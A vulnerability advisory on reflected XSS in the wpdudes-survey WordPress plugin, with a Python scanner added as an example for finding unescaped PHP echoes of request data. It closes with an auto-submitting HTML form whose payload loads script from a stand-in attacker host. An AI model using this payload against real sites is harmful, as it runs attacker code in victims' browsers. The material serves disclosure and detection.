Advisory #: 1178
Title: Reflected XSS in WordPress plugin wpdudes-survey v1.0.4
Author: Larry W. Cashdollar, @_larry0
Date: 2016-02-09
Download Site: https://wordpress.org/plugins/wpdudes-survey
Downloads: 582
Vendor Notified: 2016-02-09
Vendor Contact: plugins@wordpress.org
Plugin Name: wpdudes-survey
Vulnerability:
There is a reflected XSS vulnerability in the following PHP code in ./wpdudes-survey/wpdudes_survey.php:

264: <input type="text" placeholder="Title" value="<?php echo $_POST['wpdudes_survey_title']; ?>" name="wpdudes_survey_title"/><br>
265: <input type="text" placeholder="Set the percentage of surveys submitted before publishing results. Enter between 1 and 100 only. Default is 50." name="wpdudes_survey_percentage_result" value="<?php echo $_POST['wpdudes_survey_percentage_result']; ?>"/><br>
266: <textarea placeholder="Provide a description or a short write-up for the purpose of this survey. People who receive this survey should get an idea of what this survey is for by reading this information." name="wpdudes_survey_desc"><?php echo $_POST['wpdudes_survey_desc']; ?></textarea><br>
267: <textarea placeholder="Add the names of the people for which this rating is being provided (Enter one name per line) " name="wpdudes_survey_names"><?php echo $_POST['wpdudes_survey_names']; ?></textarea><br>
269: <input placeholder='RATING TYPE. Enter a description for the type of rating. Example: Excellent performer or Poor Communications Skills etc.' type='text' name='desc_1' value="<?php echo $_POST['desc_1']; ?>">
270: <input placeholder='RATING TYPE. Enter a description for the type of rating. Example: Excellent performer or Poor Communications Skills etc.' type='text' name='desc_2' value="<?php echo $_POST['desc_2']; ?>">
273: <textarea placeholder="Add the list of email addresses of the people who need to submit this survey (Enter one email address per line) " name="wpdudes_survey_emails"><?php echo $_POST['wpdudes_survey_emails']; ?></textarea><br>

The variable wpdudes_survey_title appears to send unsanitized data back to the user's browser via a POST request.
CVE-ID: Not Released
File:./wpdudes-survey/wpdudes_survey.php
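The pattern behind this advisory is a request parameter echoed straight into HTML with no output escaping, so it lends itself to an automated check. The Python script below is an added example and is not part of the advisory or of the plugin: it walks PHP source line by line, reports every short echo tag that prints a superglobal (`$_POST`, `$_GET`, ...) unless the outermost call is a known escaping function, and treats the WordPress escapers `esc_attr()` (for attribute values) and `esc_textarea()` (for textarea bodies) as the expected fix. The vulnerable sample lines are constructed from the seven fields quoted above with their long placeholders trimmed; the hardened lines, including the `wp_unslash()` call and the `?? ''` default, are my assumption of what a corrected rendering would look like, not code from the plugin.

```python
import re
from dataclasses import dataclass

# Superglobal lookups such as $_POST['wpdudes_survey_title']
SUPERGLOBAL = re.compile(r"\$_(POST|GET|REQUEST|COOKIE|SERVER)\[\s*['\"]([^'\"]+)['\"]\s*\]")
# A PHP echo tag embedded in HTML: <?php echo EXPR; ?>
ECHO_TAG = re.compile(r"<\?(?:php)?\s*echo\s+(?P<expr>.*?);?\s*\?>")
# Outermost calls that make the echoed value safe for its output context
ESCAPERS = {"esc_attr", "esc_html", "esc_textarea", "esc_url", "esc_js",
            "htmlspecialchars", "intval", "absint"}


@dataclass
class Finding:
    line: int        # 1-based line number within the scanned source
    source: str      # which superglobal (POST, GET, ...)
    param: str       # the request parameter name
    expr: str        # the echoed expression as written


def find_unescaped_echoes(php_source: str) -> list[Finding]:
    """Return every echo of a request parameter that is not wrapped in an escaper.

    The check is deliberately simple: it inspects one echo tag at a time and
    accepts the expression only when its outermost call is a known escaping or
    integer-casting function. Anything else that touches a superglobal is
    reported for manual review.
    """
    findings = []
    for lineno, line in enumerate(php_source.splitlines(), start=1):
        for tag in ECHO_TAG.finditer(line):
            expr = tag.group("expr").strip()
            sg = SUPERGLOBAL.search(expr)
            if sg is None:
                continue  # does not print request data
            outer = re.match(r"([A-Za-z_][A-Za-z0-9_]*)\s*\(", expr)
            if outer and outer.group(1) in ESCAPERS:
                continue  # e.g. esc_attr( wp_unslash( $_POST[...] ) )
            findings.append(Finding(lineno, sg.group(1), sg.group(2), expr))
    return findings


# Constructed sample: the seven fields from the advisory, reduced to the
# relevant markup (placeholders trimmed).
VULNERABLE_SAMPLE = """\
<input type="text" placeholder="Title" value="<?php echo $_POST['wpdudes_survey_title']; ?>" name="wpdudes_survey_title"/><br>
<input type="text" name="wpdudes_survey_percentage_result" value="<?php echo $_POST['wpdudes_survey_percentage_result']; ?>"/><br>
<textarea name="wpdudes_survey_desc"><?php echo $_POST['wpdudes_survey_desc']; ?></textarea><br>
<textarea name="wpdudes_survey_names"><?php echo $_POST['wpdudes_survey_names']; ?></textarea><br>
<input type='text' name='desc_1' value="<?php echo $_POST['desc_1']; ?>">
<input type='text' name='desc_2' value="<?php echo $_POST['desc_2']; ?>">
<textarea name="wpdudes_survey_emails"><?php echo $_POST['wpdudes_survey_emails']; ?></textarea><br>
"""

# Constructed (assumed) hardened rendering of two of the fields: attribute
# values go through esc_attr(), textarea bodies through esc_textarea().
HARDENED_SAMPLE = """\
<input type="text" name="wpdudes_survey_title" value="<?php echo esc_attr( wp_unslash( $_POST['wpdudes_survey_title'] ?? '' ) ); ?>"/><br>
<textarea name="wpdudes_survey_desc"><?php echo esc_textarea( wp_unslash( $_POST['wpdudes_survey_desc'] ?? '' ) ); ?></textarea><br>
"""

if __name__ == "__main__":
    for f in find_unescaped_echoes(VULNERABLE_SAMPLE):
        print(f"line {f.line}: $_{f.source}['{f.param}'] echoed unescaped: {f.expr}")
    print("hardened sample findings:", find_unescaped_echoes(HARDENED_SAMPLE))
```

Run against the vulnerable sample the script reports all seven parameters, not only `wpdudes_survey_title`, which is the point of reviewing a scanner hit by hand: every echoed field in the form needs the same fix. The regex only sees one line at a time and only recognises the escapers listed in `ESCAPERS`, so a clean result is a reason to stop worrying about this pattern, not proof that the file is free of XSS.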
Exploit Code:
The exploit was derived from the first vulnerable parameter that appears in the code; there may be more, as shown above.
This is an untested autogenerated exploit:
XSS POST exploit modified from http://blog.portswigger.net/2007/03/exploiting-xss-in-post-requests.html

<form name=TheForm action=http://[target]/wp-content/plugins/wpdudes-survey/wpdudes_survey.php method=post>
  <input type=hidden name=wpdudes_survey_title value=&quot;&gt;&lt;script&#32;src=http://attacker/bad.js&gt;&lt;/script&gt;>
</form>
<script>
  document.TheForm.submit();
</script>